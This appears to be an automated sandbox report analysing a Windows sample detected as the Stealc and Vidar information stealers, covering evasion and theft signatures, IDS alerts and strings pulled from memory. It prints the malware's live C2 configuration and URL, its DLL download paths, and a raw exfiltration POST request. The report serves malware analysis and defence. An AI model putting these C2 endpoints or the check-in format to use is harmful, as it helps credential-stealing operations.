Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519736
MD5:	b061af520eebe18f1c54e1d95c2db957
SHA1:	2c190ae0e8a2030ba33b2891a24fc37008921167
SHA256:	88e31cac8e771a560163e9e270d04e1b803c7c78cda1845dbc0ea7af5366d707
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B061AF520EEBE18F1C54E1D95C2DB957)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1717801615.0000000004E90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1991553244.000000000133E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 7344	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7344	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7344	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7344	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.690000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:40:04.224238+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:40:04.215646+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:40:04.447592+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:40:05.589528+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:40:04.455258+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:40:03.985872+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:40:06.108604+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:13.612683+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:15.158100+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:16.308824+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:17.238984+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:20.152920+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:20.769474+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 45 46 42 44 37 35 32 44 42 36 31 37 30 39 33 34 31 30 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 2d 2d 0d 0a Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="hwid"5EEFBD752DB61709341086------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="build"save------KFCFBFHIEBKJKFHIEBFB--

Source: file.exe, 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1991553244.000000000133E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1991553244.0000000001397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1991553244.00000000013C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1991553244.00000000013C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1991553244.00000000013C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1991553244.00000000013C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll9
Source: file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllb
Source: file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllu
Source: file.exe, 00000000.00000002.1991553244.00000000013C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1991553244.00000000013C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1991553244.000000000133E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll:
Source: file.exe, 00000000.00000002.1991553244.00000000013C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllg
Source: file.exe, 00000000.00000002.1991553244.0000000001397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1991553244.0000000001397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php1
Source: file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
Source: file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpBR
Source: file.exe, 00000000.00000002.1991553244.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpCoinomi
Source: file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpER
Source: file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpH
Source: file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpU1R
Source: file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpY
Source: file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpc=0f
Source: file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpesSf
Source: file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpi
Source: file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpic
Source: file.exe, 00000000.00000002.1991553244.0000000001397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpnfigOverlay
Source: file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpogZf
Source: file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpq
Source: file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
Source: file.exe, 00000000.00000002.1991553244.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1991553244.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpus.wallet
Source: file.exe, 00000000.00000002.1991553244.000000000133E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37DJ
Source: file.exe, 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2014899575.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2014495599.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2003678087.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: BKECBAKF.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1991553244.0000000001419000.00000004.00000020.00020000.00000000.sdmp, EGHCAKKEGCAAFHJJJDBK.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1991553244.0000000001419000.00000004.00000020.00020000.00000000.sdmp, EGHCAKKEGCAAFHJJJDBK.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: BKECBAKF.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BKECBAKF.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BKECBAKF.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1991553244.0000000001419000.00000004.00000020.00020000.00000000.sdmp, EGHCAKKEGCAAFHJJJDBK.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1991553244.0000000001419000.00000004.00000020.00020000.00000000.sdmp, EGHCAKKEGCAAFHJJJDBK.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: BKECBAKF.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BKECBAKF.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BKECBAKF.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: EGHCAKKEGCAAFHJJJDBK.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: CAKKJKKECFIDGDHIJEGDAKFBFB.0.dr	String found in binary or memory: https://support.mozilla.org
Source: CAKKJKKECFIDGDHIJEGDAKFBFB.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: CAKKJKKECFIDGDHIJEGDAKFBFB.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000003.1789346818.000000001D4BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000003.1789346818.000000001D4BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1991553244.0000000001419000.00000004.00000020.00020000.00000000.sdmp, EGHCAKKEGCAAFHJJJDBK.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: BKECBAKF.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1991553244.0000000001419000.00000004.00000020.00020000.00000000.sdmp, EGHCAKKEGCAAFHJJJDBK.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: BKECBAKF.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: CAKKJKKECFIDGDHIJEGDAKFBFB.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: CAKKJKKECFIDGDHIJEGDAKFBFB.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: CAKKJKKECFIDGDHIJEGDAKFBFB.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1928574534.000000002979D000.00000004.00000020.00020000.00000000.sdmp, CAKKJKKECFIDGDHIJEGDAKFBFB.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/x1024
Source: CAKKJKKECFIDGDHIJEGDAKFBFB.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1928574534.000000002979D000.00000004.00000020.00020000.00000000.sdmp, CAKKJKKECFIDGDHIJEGDAKFBFB.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: file.exe, 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
